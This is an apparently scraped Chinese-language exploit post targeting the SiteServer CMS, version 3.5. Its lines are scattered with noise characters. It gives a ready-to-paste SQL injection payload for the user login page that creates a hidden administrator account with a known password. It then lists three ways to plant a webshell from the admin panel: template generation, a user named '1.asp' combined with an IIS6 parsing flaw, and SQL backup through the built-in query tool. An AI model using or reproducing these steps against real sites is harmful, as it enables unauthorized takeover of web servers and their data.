经测试秒杀最新的3.5版" V) d l3 R7 }# B$ q5 B1 }/ g
stieserver官网:www.siteserver.cn
- \9 u' `8 [/ p- _1 a) |( {" {EXP:# p& N# A# Q3 p- ]& Z3 I+ B
直接访问UserCenter/login.aspx) a j7 {9 ]6 o3 L: k
用户名处输入:, w! ?* J; b0 f0 |9 g
9 D, r& g8 r ]123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 M+ B- N* L& r j- E密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
% A2 n$ m2 v$ S1 P* R之后再访问后台SiteServer/login.aspx用插入的用户登陆' `. f! j% p- e2 V! H
后台拿webshell的三种方法:
8 y. Q) `6 k5 |+ s" I7 B一、
5 L3 j- D& ~4 ~5 y; Y, d$ X站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx/ q# Q* T# o; e2 z
二、
% C/ h2 ? ]; l, n" a成员权限-》添加用户-》用户名为:1.asp2 I+ j# o: x1 O: I) F
http://127.0.0.1/usercenter/( S Y1 Z9 x: {% M; Q" v' B; d( o f
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. |# m ?& F# V- n) O0 J(ps:后台添加用户时不会验证是否含有非法字符)% u. e ] t7 _9 ]* R. Z! B' e
三、! C2 w; d4 B# Y& `. Y
系统工具-》实用工具-》机器参数查看
7 O9 G# u( O, R4 n+ L9 h可以看到数据库类型、名称,WEB路径# |/ c; Z) ?/ m5 J; l
系统工具-》数据库工具-》SQL语句查询
) p3 u6 Y/ O% E: g2 V这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |